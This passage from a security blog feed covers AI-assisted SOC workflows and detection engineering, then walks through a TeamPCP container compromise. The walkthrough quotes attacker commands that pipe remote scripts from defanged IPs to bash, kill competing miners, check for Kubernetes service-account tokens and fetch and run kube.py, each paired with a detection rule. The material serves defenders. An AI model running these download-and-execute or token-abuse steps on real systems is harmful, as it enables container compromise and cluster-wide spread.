<p><strong>Attack Summary:</strong> A high-level overview, generated by Attack Discovery, detailing what has occurred.</p>
</li>
<li>
<p><strong>Attached Alerts:</strong> The specific security alerts that triggered the initial observation.</p>
</li>
<li>
<p><strong>Observables:</strong> A list of suspicious artifacts (IP addresses, file hashes, domains, etc.) collected from the event.</p>
</li>
<li>
<p><strong>Attached Events:</strong> Events that, while not alerts themselves, provide critical context and are of further interest to the investigation.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image2.png" alt="" /></p>
</li>
</ul>
<ol start="3">
<li><strong>Supporting the Investigation</strong><br />
To support the immediate findings, detailed <strong>Investigations</strong> are attached directly to the Case. These investigations allow the analyst to visually and contextually step through the sequence of events leading up to, during, and immediately following the attack.<br />
The Elastic Case also provides instant context by highlighting <strong>Similar cases</strong>. By cross-referencing observables, the system identifies previous incidents involving the same entities or artifacts, providing a deeper understanding of the threat actor's history and potential motives.</li>
<li><strong>The Path to Resolution</strong><br />
The agent doesn’t just catalog the past; it charts the path forward. A clear set of <strong>Next steps and actions</strong> is outlined, with specific team members assigned for review and execution.</li>
</ol>
<p>The analyst then steps through a methodical process reviewing the automated analysis:</p>
<ol>
<li><strong>Reviewing Findings:</strong> Scrutinizing all aggregated data, alerts, and investigations.</li>
<li><strong>Evidence Collection:</strong> Collecting any additional forensic evidence needed for a complete analysis.</li>
<li><strong>Remediation:</strong> Executing manual or automated actions, such as deleting malicious files or killing persistent processes on the isolated host with Elastic Defend.</li>
<li><strong>Final Release:</strong> Eventually, the host is safely released back to the network, but not before additional, targeted rules or policies are automatically applied to prevent a recurrence based on the lessons learned from this incident.<br />
In the Agentic SOC, the analyst moves seamlessly from a high-level alert to a comprehensive investigation to full remediation—all within a unified, intelligent workflow powered by Elastic.</li>
</ol>
<h2>Elastic Security and Core SIEM Workflows</h2>
<p>Before exploring advanced agentic workflows, it's essential to recognize that Elastic Security already provides a comprehensive suite of core capabilities crucial for modern security operations. This foundation begins with the ingestion of security-relevant data, which is automatically normalized to a common schema, ensuring consistency and ease of analysis. The platform offers Extended Detection and Response (XDR) capabilities via Elastic Defend, a robust detection engine built directly into the Elastic Stack, and sophisticated alert workflows that include built-in correlations to reduce noise and surface true threats.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image4.png" alt="" /></p>
<p>Elastic Security further differentiates itself by tightly integrating key operational functions. This includes entity-based threat hunting, machine learning for anomaly detection and behavior analysis, and comprehensive case management for tracking incidents. Finally, the platform provides end-to-end response and forensic capabilities, enabling security teams to move swiftly from initial alert to investigation and remediation, all within a unified, scalable platform.</p>
<h2>Empowering Analysts with Agentic Capabilities</h2>
<h3>AI-Powered Alert Triage and Prioritization</h3>
<p>The Elastic Security Solution integrates AI capabilities via <strong>Agent Builder</strong> to augment and make SOC operations truly agentic. This is where efficiency improvements are most keenly felt:</p>
<ul>
<li><strong>Conversational Triage:</strong> A built-in agent is readily available to Tier 1/2 analysts, allowing them to use conversational commands to query and prioritize open alerts (e.g., &quot;What priority alerts should I review from the last 30 days?&quot;). This is the first entry point for using AI to augment SOC operations.</li>
<li><strong>LLM Agnostic Platform:</strong> A key differentiating feature of Elastic's <strong>Agent Builder</strong> is that it is <strong>LLM agnostic</strong>, allowing organizations to pick their preferred model, even locally running models for privacy or regulatory reasons.</li>
<li><strong>Attack Discovery:</strong> This premier feature moves beyond basic triage. It uses LLM configurations to create <strong>higher-order attack detections</strong>, taking hundreds of open alerts and prioritizing them into a small, manageable subset of known attacks or incidents. This dramatically reduces the impact of alert fatigue.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image3.png" alt="" /></p>
<h3>Enriched Investigations</h3>
<p>Once an attack or incident is found, the agent helps start the investigation:</p>
<ul>
<li><strong>Summarization and Enrichment:</strong> The agent can be used to summarize the attack, identify important artifacts, and conduct automated third-party enrichments (like checking VirusTotal). This tailored experience provides a full assessment, including an attack chain, threat intelligence information, related cases, entity risk scoring, and a full investigation guide.</li>
<li><strong>Case Management:</strong> The agent can be instructed to take immediate action, such as generating a security case and notifying the team in Slack, all through simple conversational commands that execute pre-configured workflows.</li>
</ul>
<h3>Automated Response and Threat Hunting</h3>
<p>The true power of the Agentic SOC is realized through action and automation that goes beyond simple conversation:</p>
<ul>
<li>
<p><strong>Workflows and SOAR-like Automation:</strong> Agents can reference and execute <strong>Workflows</strong>, Elastic's SOAR-like automation tool. These workflows allow analysts to take immediate, complex actions. For example, a command like &quot;Please create a case for this attack, and notify my team in Slack&quot; triggers multiple, pre-defined steps. Further critical response actions, such as <strong>isolating a host</strong>, can be executed with a single workflow action while the investigation continues.</p>
</li>
<li>
<p><strong>AI-Assisted Threat Hunting:</strong> AI assists threat hunters by leveraging <strong>Entity Analytics</strong> and pre-built skills. The agent can be asked to find high-risk hosts and users to begin hunting, and then automatically generate specific ES|QL queries (e.g., &quot;Please tell me the most uncommon processes executed for each host&quot;) to uncover unusual or malicious activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image1.png" alt="" /></p>
</li>
</ul>
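<p>To make that last request concrete, a hunt for uncommon processes per host could take roughly this shape in ES|QL (the index pattern and rarity threshold here are illustrative assumptions, not the agent's actual output):</p>
<pre><code class="language-sql">FROM logs-endpoint.events.process-*
| WHERE event.type == &quot;start&quot;
// count how often each process runs on each host
| STATS exec_count = COUNT(*) BY host.name, process.name
// keep only processes seen a handful of times on a given host
| WHERE exec_count &lt;= 3
| SORT exec_count ASC
| LIMIT 100
</code></pre>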
<h3>The Mandate of Automation</h3>
<p>For maximum effectiveness, all these steps, from alert triage and enrichment to case creation and host isolation, can be configured to run <strong>automatically</strong> as an Agentic Alert Triage workflow. This allows the system to begin solving problems as soon as they are discovered, keeping the human analyst in the loop with a consolidated case and all the necessary findings in a single pane of glass.</p>
<p>This approach delivers substantial <strong>efficiency improvements</strong>, making speed the single most important factor in a modern, Agentic SOC.</p>
<h2>Elastic’s Agentic Security Operations Platform</h2>
<p>Whether you use our UI, our agents, or your own, Elastic Security provides a strong, open foundation for modern security operations: best-in-class data architecture, search, workflows, analytics, detection engineering content, and automation.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly.</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/streamlining-the-security-analyst-experience.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Supercharge Your SOC]]></title>
            <link>https://www.elastic.co/kr/security-labs/supercharge-your-soc</link>
            <guid>supercharge-your-soc</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Detection Engineering in the Era of AI Agents - The New Frontier.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>The landscape of cybersecurity is evolving, and the role of the Detection Engineer (DE) is more critical and demanding than ever. Traditionally, this role involves a comprehensive, end-to-end workflow: from threat modeling and telemetry tuning to writing, testing, and maintaining performance-optimized detection rules to flag malicious behavior.</p>
<p><strong>Elastic Security is purpose-built to streamline this entire workflow, empowering DEs - and anyone involved in security operations - to build, manage, and optimize detection rules at scale. This allows security teams to concentrate their efforts on the most critical task: protecting the organization.</strong></p>
<p>The rise of generative AI and, more specifically, advanced AI <strong>coding agents</strong> like Claude and Cursor, is fundamentally changing and supercharging this workflow. These tools are no longer just for general software development; they are becoming expert partners for the Security Operations Center (SOC). By integrating the power of conversational AI, these agents can take high-level security requirements and instantly translate them into validated, workable detection logic.</p>
<h1>From Generalist to Elastic Expert: Agent Skills</h1>
<p>Elastic Security is embracing this shift not only by having native AI capabilities built into our agentic security operations platform, but also by <a href="https://www.elastic.co/kr/search-labs/blog/agent-skills-elastic">open-sourcing <strong>agent skills for 3rd party agentic IDEs</strong></a>, a native platform experience for the entire Elastic ecosystem (Security, Observability, etc.). By loading these skills into any agent runtime, your AI assistant moves from being a generalist to an on-demand expert in Elastic’s tooling. You can then ask your agent to triage alerts or, in this context, expertly create and tune detection rules.</p>
<h1>A Use Case Walkthrough: The Notepad++ Attack</h1>
<p>To illustrate the agent’s power, let’s look at a real-world supply chain attack involving a backdoor targeting the Notepad++ infrastructure, described in Elastic Security Labs’ blog, <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">“Speeding APT Attack”</a>.</p>
<h2>Instant Conditional Rules</h2>
<p>A detection engineer’s first step is often to create conditional rules based on known Indicators of Compromise (IOCs). To begin, we can instruct the agent to investigate data within Elastic Security, as evidence of the attack was present in our cluster.</p>
<pre><code>&quot;Can you help me create a detection rule that will detect malicious activity similar
 to what I'm seeing in my Elastic Security deployment involving notepad++.exe 
 and BluetoothService.exe?&quot;
</code></pre>
<p>The agent immediately went to work:</p>
<ul>
<li>It rapidly found process lineage and documented attack details.</li>
<li>It extracted key IOCs and found the corresponding MITRE ATT&amp;CK™ mappings.</li>
<li>It generated two foundational rules: one for a suspicious child process spawned by <strong>Notepad++</strong>, and one focusing on the masqueraded executable.</li>
<li>Crucially, the rules were immediately tested against threat emulation data, confirming multiple successful hits.</li>
</ul>
<p>Each step happens quickly, and the built-in validation significantly accelerates the 'test and tune' phase.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image2.png" alt="Agent progress initiating creation of conditional detection rules (Claude Code shown)" title="Agent progress initiating creation of conditional detection rules (Claude Code shown)" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image7.png" alt="Agent report after creating two conditional detection rules (Claude Code shown)" title="Agent report after creating two conditional detection rules (Claude Code shown)" /></p>
<p>Let’s take a look at the agent-created rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image3.png" alt="Agent-created rule details appear seamlessly in Elastic Security" title="Agent-created rule details appear seamlessly in Elastic Security" /></p>
<h2>Diving into Advanced ES|QL Aggregation</h2>
<p>Conditional logic is great, but modern threats require more behavioral and entity-focused detections. Using Elastic’s powerful piping language, <a href="https://www.elastic.co/kr/docs/reference/query-languages/esql">ES|QL</a> (the Elasticsearch Query Language), the agent was challenged to create an <strong>aggregation-based rule</strong> that looks for generic, suspicious characteristics across tasks, aggregates them, and assigns a dynamic risk score to host and user entities.</p>
<p>The agent delivered, creating an advanced query that looks for suspicious executables, negates benign directories, and assigns scores based on the activity's risk level. This demonstrates the agent's ability to create sophisticated detections unique to Elastic's capabilities, moving beyond simple lookups to complex entity analytics.</p>
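<p>As a simplified sketch of what such an aggregation-based rule can look like in ES|QL (the index pattern, path filters, and score thresholds here are illustrative assumptions, not the agent's actual query):</p>
<pre><code class="language-sql">FROM logs-endpoint.events.process-*
| WHERE event.type == &quot;start&quot;
  // negate well-known benign directories
  AND NOT process.executable LIKE &quot;*Program Files*&quot;
  AND NOT process.executable LIKE &quot;*System32*&quot;
// assign a simple risk weight per suspicious characteristic
| EVAL risk = CASE(
    process.executable LIKE &quot;*AppData*&quot;, 50,
    process.executable LIKE &quot;*Temp*&quot;, 30,
    10)
// aggregate risk per host and user entity
| STATS total_risk = SUM(risk), suspicious_execs = COUNT(*) BY host.name, user.name
| WHERE total_risk &gt;= 70
| SORT total_risk DESC
</code></pre>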
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image4.png" alt="Agent creating aggregation-based detection rule (Claude Code shown)" title="Agent creating aggregation-based detection rule (Claude Code shown)" /></p>
<p>Here’s the rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image1.png" alt="More complex aggregation-based rule appears properly in Elastic Security" title="More complex aggregation-based rule appears properly in Elastic Security" /></p>
<h2>Sequential Detections with EQL and Suppression</h2>
<p>To detect multi-stage attacks, a <strong>sequential rule</strong> is essential—if Event A, then Event B, then Event C, then alert. Using the <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/eql">Event Query Language (EQL)</a>, the agent crafted a perfect three-stage sequence for the attack:</p>
<ol>
<li>Unsigned dropper activity.</li>
<li>Service masquerade (implant deployed).</li>
<li>Final execution for persistence.</li>
</ol>
<p>To make the rule more reliable and reduce noise, suppression logic was then added, focusing on limiting alerts per unique Host ID. This quick iteration shows how an agent can help a detection engineer rapidly move from a basic detection to a highly robust, multi-stage rule.</p>
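<p>As an illustrative sketch (not the agent's actual output), a three-stage EQL sequence for this attack could look like the following. Field values are drawn from the behavior described in this post, and alert suppression on <code>host.id</code> would be configured in the rule's settings:</p>
<pre><code class="language-sql">sequence by host.id with maxspan=30m
  /* stage 1: unsigned dropper executes from a user directory */
  [process where event.type == &quot;start&quot; and
   process.executable : &quot;C:\\Users\\*\\AppData\\*&quot; and
   process.code_signature.trusted != true]
  /* stage 2: masqueraded service binary (name does not match PE metadata) */
  [process where event.type == &quot;start&quot; and
   process.name : &quot;BluetoothService.exe&quot; and
   process.pe.original_file_name != &quot;BluetoothService.exe&quot;]
  /* stage 3: persistence execution under the service control manager */
  [process where event.type == &quot;start&quot; and
   process.parent.name : &quot;services.exe&quot;]
</code></pre>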
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image6.png" alt="Agent creating advanced sequence-based detection rule (Claude Code shown)" title="Agent creating advanced sequence-based detection rule (Claude Code shown)" /></p>
<h2>The LLM-Augmented Query: Summaries in the Alert</h2>
<p>The ultimate demonstration of the new agentic workflow is using <a href="https://www.elastic.co/kr/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion">Elastic’s <strong>ES|QL COMPLETION syntax</strong></a>. This feature allows an inference model to be referenced <em>directly within the query</em>.</p>
<p>The prompt asked the agent to:</p>
<pre><code>Based off this recent elastic blog,
 https://www.elastic.co/kr/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion, 
 create a rule that incorporates a COMPLETION command with my  default inference 
 model that will summarize findings from attack into one &quot;esql.summary&quot;
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image5.png" alt="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" title="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" /></p>
<p>The result? The generated rule didn't just fire an alert; it natively included an <strong>ES|QL summary row</strong> in the alert itself:</p>
<blockquote>
<p>This telemetry shows a masquerading technique where a process named &quot;BluetoothService.exe&quot; is executing from a user's AppData directory with a PE original name of &quot;BDSubWiz.exe&quot; (a legitimate file mismatch), running as SYSTEM with service-like characteristics including spawning from services.exe, indicating persistence establishment (MITRE ATT&amp;CK T1036.004 Masquerading and T1543 Service Persistence). The executable's location in a user directory, combined with SYSTEM-level execution, service persistence indicators, and the name/PE mismatch across multiple events, suggests Defense Evasion and Persistence stages. This represents high severity due to successful SYSTEM-level persistence with active defense evasion through masquerading.</p>
</blockquote>
<p>This cuts triage time dramatically, as analysts no longer need to pivot to a separate runbook to understand the context and severity of the alert.</p>
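<p>For reference, a query using <code>COMPLETION</code> has roughly the following shape. This is a hedged sketch: the inference endpoint name is a placeholder, and the exact <code>COMPLETION</code> syntax has evolved across recent releases, so consult the linked blog and the ES|QL documentation for your version:</p>
<pre><code class="language-sql">FROM logs-endpoint.events.process-*
| WHERE process.name == &quot;BluetoothService.exe&quot;
| KEEP @timestamp, host.name, user.name, process.executable, process.parent.name
| LIMIT 20
// ask the configured inference model to summarize each row
| COMPLETION `esql.summary` = CONCAT(
    &quot;Summarize this process event for a SOC analyst, noting likely &quot;,
    &quot;MITRE ATT&amp;CK techniques: &quot;, process.executable)
  WITH { &quot;inference_id&quot; : &quot;my-default-inference-endpoint&quot; }
</code></pre>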
<h1>The Agentic SOC is Here</h1>
<p>The collaboration between AI agents and the Elastic Security solution provides a glimpse into Elastic’s <a href="https://www.elastic.co/kr/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc"><strong>Agentic SOC</strong></a> of the future. It’s a world where detection engineers can have a conversation, define their intent, and instantly generate, test, and deploy highly sophisticated, context-rich detection rules. This is not about replacing the human expert, but about augmenting their knowledge and accelerating their workflow, allowing them to focus on high-value threat intelligence and modeling.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly.</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/supercharge-your-soc.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario]]></title>
            <link>https://www.elastic.co/kr/security-labs/teampcp-container-attack-scenario</link>
            <guid>teampcp-container-attack-scenario</guid>
            <pubDate>Fri, 20 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This publication provides a real-world walkthrough of TeamPCP's multi-stage container compromise, demonstrating how Elastic's D4C surfaces runtime signals across each stage of the attack chain.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/kr/security-labs/getting-started-with-defend-for-containers">the previous article</a>, we examined how Defend for Containers (D4C) is deployed, how its policy model operates, and how its runtime telemetry is structured. With that foundation in place, the next step is to move from configuration and field analysis to applied detection engineering.</p>
<p>This post walks through a realistic container attack scenario based on the TeamPCP cloud-native ransomware operation, as <a href="https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware">documented by Flare</a>. Rather than analyzing isolated techniques in the abstract, we follow the attack as it unfolds inside a containerized environment and examine how each stage manifests in D4C telemetry.</p>
<p>When mapped to MITRE ATT&amp;CK, the activity in this scenario spans nearly the entire attack lifecycle. The intrusion progresses from execution and discovery inside the container to persistence, lateral movement, command-and-control activity, and ultimately impact.</p>
<p>By mapping these behaviors to concrete detection logic, this article demonstrates how D4C enables detection engineers to identify container compromise not as isolated suspicious commands, but as part of a structured attack chain.</p>
<h2>TeamPCP - an emerging force in the cloud native and ransomware landscape</h2>
<p>This scenario walks through the container compromise and propagation stage of the TeamPCP cloud-native ransomware operation, recently researched and documented by Flare. Rather than treating this as an abstract case study, the flow below mirrors how the attack plays out in practice and shows how D4C telemetry and pre-built detections surface each stage of the intrusion.</p>
<p>At a high level, the threat actor’s objectives in this stage are:</p>
<ol>
<li>Gain interactive code execution inside a container</li>
<li>Determine whether the workload runs in Kubernetes</li>
<li>Establish durable execution and persistence</li>
<li>Propagate laterally across pods and nodes</li>
<li>Prepare the environment for large-scale monetization (mining, ransomware, or resale)</li>
</ol>
<p>Each of these goals leaves behind observable runtime behavior that D4C is well-positioned to detect.</p>
<h3>Stage 1 – Initial execution via download and pipe-to-shell</h3>
<p>The attack begins with a familiar but effective technique: downloading and immediately executing a script via a shell pipeline.</p>
<pre><code class="language-shell">curl -fsSL http://67.217.57[.]240:666/files/proxy.sh | bash
</code></pre>
<p>The intent here is to gain immediate execution while avoiding file creation. This is a classic tradecraft choice: no payload written to disk, no obvious artifact to scan.</p>
<p>From D4C's perspective, this still results in a highly suspicious runtime pattern. An interactive <code>curl</code> process executes inside a container and immediately spawns a shell interpreter. The parent–child relationship, command line, and container context are all captured.</p>
<pre><code class="language-sql">sequence by process.parent.entity_id, container.id with maxspan=1s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
   process.name in (&quot;curl&quot;, &quot;wget&quot;)]
  [process where event.action in (&quot;exec&quot;, &quot;end&quot;) and
   process.name like (
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;,
     &quot;python*&quot;, &quot;perl*&quot;, &quot;ruby*&quot;, &quot;lua*&quot;, &quot;php*&quot;
   ) and
   process.args like (
     &quot;-bash&quot;, &quot;-dash&quot;, &quot;-sh&quot;, &quot;-tcsh&quot;, &quot;-csh&quot;, &quot;-zsh&quot;, &quot;-ksh&quot;, &quot;-fish&quot;,
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;,
     &quot;/bin/bash&quot;, &quot;/bin/dash&quot;, &quot;/bin/sh&quot;, &quot;/bin/tcsh&quot;, &quot;/bin/csh&quot;,
     &quot;/bin/zsh&quot;, &quot;/bin/ksh&quot;, &quot;/bin/fish&quot;,
     &quot;/usr/bin/bash&quot;, &quot;/usr/bin/dash&quot;, &quot;/usr/bin/sh&quot;, &quot;/usr/bin/tcsh&quot;,
     &quot;/usr/bin/csh&quot;, &quot;/usr/bin/zsh&quot;, &quot;/usr/bin/ksh&quot;, &quot;/usr/bin/fish&quot;,
     &quot;-busybox&quot;, &quot;busybox&quot;, &quot;/bin/busybox&quot;, &quot;/usr/bin/busybox&quot;,
     &quot;*python*&quot;, &quot;*perl*&quot;, &quot;*ruby*&quot;, &quot;*lua*&quot;, &quot;*php*&quot;, &quot;/dev/fd/*&quot;
   )]
</code></pre>
<p>This rule detects the download → interpreter execution pattern, even when no file is written to disk. Detecting this step is critical, as it is the first reliable indicator of hands-on-keyboard activity within a container.</p>
<p>Upon execution, TeamPCP scans the target system for competing mining processes and uses the <code>pkill</code> command to terminate them.</p>
<pre><code class="language-shell">pkill -9 xmrig 2&gt;/dev/null || true
pkill -9 XMRig 2&gt;/dev/null || true
curl -fsSL http://update.aegis.aliyun.com/download/uninstall.sh | bash 2&gt;/dev/null || true
</code></pre>
<p>Compared to rival cryptojacking campaigns, TeamPCP's competitor-killing logic is very limited, targeting only <code>xmrig</code>. Manual process killing in containers is uncommon, especially when performed via interactive processes.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
container.id like &quot;*?&quot; and 
(
  process.name in (&quot;kill&quot;, &quot;pkill&quot;, &quot;killall&quot;) or
  (
    /*
       Account for tools that execute utilities as a subprocess,
       in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;kill&quot;, &quot;/bin/kill&quot;, &quot;/usr/bin/kill&quot;, &quot;/usr/local/bin/kill&quot;,
      &quot;pkill&quot;, &quot;/bin/pkill&quot;, &quot;/usr/bin/pkill&quot;, &quot;/usr/local/bin/pkill&quot;,
      &quot;killall&quot;, &quot;/bin/killall&quot;, &quot;/usr/bin/killall&quot;, &quot;/usr/local/bin/killall&quot;
    )
  )
)
</code></pre>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml">Payload Execution via Shell Pipe Detected by Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/impact_process_killing.toml">Process Killing Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon initial access:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image4.png" alt="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" title="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" /></p>
<h3>Stage 2 – Kubernetes environment discovery</h3>
<p>After gaining execution, the attacker checks whether the container is running inside Kubernetes by testing for a service account token:</p>
<pre><code class="language-shell">if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]
</code></pre>
<p>This check determines whether the attack can expand beyond the current container. If the token exists, the attacker proceeds to abuse the Kubernetes API. Additionally, the dropped scripts enumerate environment variables and several sensitive file locations, triggering numerous discovery-related alerts.</p>
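<p>A minimal Python sketch of this gating check (the path is the standard Kubernetes service account mount; the temporary root directory is only there to make the example self-contained):</p>
<pre><code class="language-python">import os, tempfile

# Standard location where Kubernetes mounts the service account token
TOKEN_REL = 'var/run/secrets/kubernetes.io/serviceaccount/token'

def in_kubernetes(root='/'):
    # The dropped scripts simply test whether the token file exists
    return os.path.isfile(os.path.join(root, TOKEN_REL))

# Simulate both outcomes under a throwaway root directory
root = tempfile.mkdtemp()
assert not in_kubernetes(root)
os.makedirs(os.path.dirname(os.path.join(root, TOKEN_REL)))
with open(os.path.join(root, TOKEN_REL), 'w') as f:
    f.write('dummy-token')
assert in_kubernetes(root)
</code></pre>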
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml">Service Account Namespace Read Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_environment_enumeration.toml">Environment Variable Enumeration Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/credential_access_service_account_token_or_cert_read.toml">Service Account Token or Certificate Read Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon discovery:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image9.png" alt="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" title="Figure 2: Detection rules triggering for stage 2: Kubernetes Environment Discovery" /></p>
<h3>Stage 3 – Lateral movement via <code>kube.py</code></h3>
<p>When a service account token is present, the attacker downloads and executes a Python script designed to enumerate pods and execute commands across the cluster:</p>
<pre><code class="language-shell">curl -fsSL http://44.252.85[.]168:666/files/kube.py -o /tmp/k8s.py
python3 /tmp/k8s.py
</code></pre>
<p>At this point, the attacker’s goal is clear: turn a single compromised container into a foothold for cluster-wide propagation using legitimate Kubernetes APIs.</p>
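<p>The full contents of <code>kube.py</code> are not reproduced here, but in-cluster API abuse of this kind typically amounts to direct HTTPS requests carrying the stolen bearer token. A hypothetical sketch of how such a request is constructed (the API server address and token below are placeholders):</p>
<pre><code class="language-python">import urllib.request

def pod_list_request(api_server, token, namespace=''):
    # Direct API access with the mounted bearer token; no kubectl involved
    path = '/api/v1/pods' if not namespace else f'/api/v1/namespaces/{namespace}/pods'
    req = urllib.request.Request(api_server + path)
    req.add_header('Authorization', f'Bearer {token}')
    return req

req = pod_list_request('https://10.96.0.1:443', 'REDACTED-TOKEN', 'default')
assert req.full_url == 'https://10.96.0.1:443/api/v1/namespaces/default/pods'
assert req.get_header('Authorization') == 'Bearer REDACTED-TOKEN'
</code></pre>
<p>Because nothing here goes through <code>kubectl</code>, the request stands out in audit logs by its unusual user agent, a point revisited in stage 9.</p>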
<p>D4C detects this stage through a combination of file and process telemetry. A script is written to a temporary directory and executed immediately via an interpreter, all within an interactive container session.</p>
<p>An interactive <code>curl</code> command that pulls a file from a remote source is a strong detection signal for long-running container workloads, which rarely fetch files interactively after deployment.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and process.interactive == true and (
  (
    (process.name == &quot;curl&quot; or process.args in (
      &quot;curl&quot;, &quot;/bin/curl&quot;, &quot;/usr/bin/curl&quot;, &quot;/usr/local/bin/curl&quot;
    )
  ) and
    process.args in (
      &quot;-o&quot;, &quot;-O&quot;, &quot;--output&quot;, &quot;--remote-name&quot;,
      &quot;--remote-name-all&quot;, &quot;--output-dir&quot;
    )
  ) or
  (
    (process.name == &quot;wget&quot; or process.args in (
      &quot;wget&quot;, &quot;/bin/wget&quot;, &quot;/usr/bin/wget&quot;, &quot;/usr/local/bin/wget&quot;
    )
  ) and
  process.args like (&quot;-*O*&quot;, &quot;--output-document=*&quot;, &quot;--output-file=*&quot;)
  )
) and (
 process.args like~ &quot;*http*&quot; or
 process.args regex &quot;.*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}[:/]{1}.*&quot;
) and container.id like &quot;?*&quot;
</code></pre>
<p>The rule above catches the remote file download, but we can go one step further by detecting a sequence of file creation followed by execution within the same container context:</p>
<pre><code class="language-sql">sequence by container.id, user.id with maxspan=3s
  [file where host.os.type == &quot;linux&quot; and event.type == &quot;creation&quot; and 
   process.interactive == true and container.id like &quot;?*&quot; and
   file.path like (
     &quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;, &quot;/root/*&quot;, &quot;/home/*&quot;
   ) and
   not process.name in (
     &quot;apt&quot;, &quot;apt-get&quot;, &quot;dnf&quot;, &quot;microdnf&quot;, &quot;yum&quot;, &quot;zypper&quot;, &quot;tdnf&quot;, &quot;apk&quot;,   
